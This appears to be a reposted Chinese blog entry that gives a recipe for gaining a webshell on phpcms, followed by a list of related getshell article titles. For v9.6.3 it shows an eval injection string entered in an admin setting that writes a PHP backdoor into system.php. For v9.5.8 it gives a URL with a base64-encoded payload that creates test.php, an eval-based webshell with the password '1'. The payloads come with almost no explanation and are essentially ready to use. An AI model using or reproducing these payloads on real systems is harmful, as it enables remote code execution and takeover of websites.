phpcms_v9.6.3后台getshell

Posted 素时听风

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了phpcms_v9.6.3后台getshell相关的知识,希望对你有一定的参考价值。

内容仅供测试使用,请遵守网络安全法

v9.6.3

安装完后登陆后台
http://127.0.0.1/phpcms/index.php?m=admin&c=index&a=login

后台 - 设置 - connect

在此处插入 \\\\\',@@eval($_POST[123]),//,闭合掉 \\phpcms\\caches\\configs\\system.php 这里的 key 参数会将一句话木马写入 system.php 文件。

访问:

v9.5.8

http://localhost/phpcms/index.php?m=content&c=content&a=public_sub_categorys&menuid=${@fputs(fopen(base64_decode(Y2FjaGVzL2NhY2hlc19tb2RlbC9jYWNoZXNfZGF0YS90ZXN0LnBocA==),w),base64_decode(PD9waHAgdmFyX2R1bXAobWQ1KHh6KSk7JGNvbnRlbnQ9c3RyaXBzbGFzaGVzKCRfUE9TVFsxXSk7ZXZhbCgkY29udGVudCk7))}&f=

会生成 /caches/caches_model/caches_data/test.php 一句话
密码 1

以上是关于phpcms_v9.6.3后台getshell的主要内容,如果未能解决你的问题,请参考以下文章

CNVD-2018-19126 EmpireCMS后台任意代码执行可GetShell

[代码审计]phpshe开源商城后台两处任意文件删除至getshell

代码审计之seacms v6.45 前台Getshell 复现分析

XerCMS-1.0.3代码审计(文件名报错注入后台getshell)

Tomcat弱口令GetShell

网站渗透总结之Getshell用法大全